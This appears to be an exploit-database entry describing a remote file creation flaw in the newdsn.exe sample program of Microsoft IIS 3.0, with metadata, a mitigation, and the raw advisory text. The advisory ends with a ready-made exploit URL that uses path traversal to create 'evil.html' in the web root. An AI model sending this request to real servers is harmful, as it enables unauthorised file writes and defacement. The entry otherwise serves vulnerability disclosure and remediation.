header-logo
Suggest Exploit
vendor:
IIS
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Creation
264
CWE
Product Name: IIS
Affected Version From: Microsoft IIS 3.0
Affected Version To: Microsoft IIS 3.0
Patch Exists: No
Related CWE: N/A
CPE: a:microsoft:iis:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2000

Microsoft IIS 3.0 Remote File Creation

Microsoft IIS 3.0 came with a sample program, newdsn.exe, installed by default in the directory wwwroot/scripts/tools/. Execution of this program with a properly submitted URL could allow for remote file creation. The file created is a Microsoft Access Database, but can have any extension, including .html.

Mitigation:

Disable the newdsn.exe program or remove it from the wwwroot/scripts/tools/ directory.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1818/info

Microsoft IIS 3.0 came with a sample program, newdsn.exe, installed by default in the directory wwwroot/scripts/tools/. Execution of this program with a properly submitted URL could allow for remote file creation. The file created is a Microsoft Access Database, but can have any extension, including .html.

http://vulnerable.site.comtools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil.html&newdb=CREATE_DB

Navigation

Suggest Exploit

Services By CQR